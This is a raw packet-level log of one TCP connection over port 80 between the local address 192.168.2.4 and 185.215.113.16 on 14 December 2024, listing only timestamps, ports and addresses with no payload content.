Dec 14, 2024 12:56:23.998569965 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.998648882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.998689890 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.999479055 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.999515057 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:23.999664068 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:23.999701023 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.001308918 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.001321077 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.001352072 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.001367092 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.003456116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.003468037 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.003499985 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.003514051 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.005096912 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.005151033 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.005258083 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.005297899 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.006608009 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.006656885 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.006794930 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.006834030 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.008105993 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.008156061 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.008255005 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.008296967 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.009501934 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.009552002 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.009666920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.009723902 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.011051893 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.011100054 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.011225939 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.011264086 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.012645006 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.012695074 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.012811899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.012849092 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.014245987 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.014256001 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.014316082 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.015795946 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.015806913 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.015842915 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.015870094 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.017334938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.017347097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.017376900 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.017390966 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.018910885 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.018925905 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.018951893 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.018968105 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.020456076 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.020513058 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.020610094 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.020657063 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.021902084 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.021961927 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.022063017 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.022100925 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.022716045 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.022759914 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.022790909 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.022912979 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.024274111 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.024317026 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.024353981 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.024389029 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.025734901 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.025785923 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.025815010 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.025868893 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.027241945 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.027283907 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.027363062 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.027410984 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.028772116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.028822899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.028827906 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.028863907 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.030175924 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.030221939 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.030284882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.030324936 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.031713009 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.031760931 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.031832933 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.031874895 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.033153057 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.033194065 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.033269882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.033315897 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.034591913 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.034635067 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.034682989 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.034723997 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.035521030 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.035573006 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.035633087 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.035674095 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.036492109 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.036545992 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.036592007 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.036643028 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.037415981 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.037436962 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.037457943 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.037477016 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.038414955 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.038474083 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.038511038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.038557053 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.039374113 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.039395094 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.039429903 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.039448977 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.040319920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.040370941 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.040453911 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.040499926 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.041469097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.041522026 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.041590929 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.041676998 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.042383909 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.042424917 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.042541981 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.042598009 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.043224096 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.043273926 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.043374062 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.043421030 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.044145107 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.044188023 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.044259071 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.044303894 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.045120001 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.045160055 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.045160055 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.045208931 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.045859098 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.045895100 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.046030045 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.046062946 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.046710014 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.046766996 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.046833038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.046874046 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.047626972 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.047678947 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.047718048 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.047761917 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.048568010 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.048612118 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.048698902 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.048738956 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.049501896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.049545050 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.166924000 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.166938066 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.166949987 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.167010069 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.167010069 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.167207003 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.167252064 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.167891026 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.167938948 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.168200016 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.168243885 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.169086933 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.169133902 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.169300079 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.169347048 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.169903994 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.169948101 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.169948101 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.169998884 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.170420885 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.170483112 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.170481920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.170531034 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.171006918 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.171055079 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.171139956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.171180964 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.171900034 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.171938896 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.171991110 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.172029972 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.172698975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.172740936 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.172789097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.172831059 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.173554897 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.173597097 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.173650980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.173691988 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.174465895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.174489975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.174503088 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.174520016 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.175232887 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.175276995 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.175331116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.175374985 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.176058054 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.176101923 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.176178932 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.176234007 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.176898003 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.176940918 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.177006960 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.177051067 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.177740097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.177788973 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.177846909 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.177890062 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.178606987 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.178649902 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.178730011 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.178771019 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.179476976 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.179517031 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.179661036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.179703951 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.180290937 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.180330992 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.180438995 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.180483103 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.181155920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.181201935 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.181266069 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.181302071 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.181988001 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.182029963 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.182043076 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.182080984 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.182872057 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.182914019 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.182934046 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.182976961 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.183666945 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.183715105 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.183793068 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.183830976 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.184535027 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.184575081 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.184668064 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.184705973 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.185391903 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.185427904 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.185512066 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.185554028 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.186208010 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.186311960 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.186340094 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.186355114 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.187068939 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.187109947 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.187210083 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.187251091 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.187891960 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.187932014 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.188052893 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.188091040 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.188781977 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.188819885 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.188954115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.188998938 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.189603090 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.189646006 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.189721107 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.189752102 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.190409899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.190448046 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.190537930 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.190574884 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.191289902 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.191381931 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.191402912 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.191426039 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.192110062 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.192147970 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.192174911 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.192212105 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.192954063 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.192995071 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.193054914 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.193094969 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.193829060 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.193871975 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.193892956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.193932056 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.194672108 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.194715023 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.194746971 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.194786072 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.195530891 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.195580006 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.195666075 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.195708036 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.196398020 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.196456909 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.196468115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.196511030 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.197135925 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.197182894 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.197246075 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.197284937 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.200757980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.200776100 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.200808048 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.200819969 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.200890064 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.200901985 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.200911999 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.200923920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.200926065 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.200938940 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.200958014 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.201288939 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.201330900 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.201438904 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.201476097 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.202297926 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.202343941 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.202491999 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.202533960 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.203154087 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.203196049 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.203353882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.203396082 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.203994036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.204006910 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.204041004 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.204056025 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.204927921 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.204938889 CET	80	49796	185.215.113.16	192.168.2.4
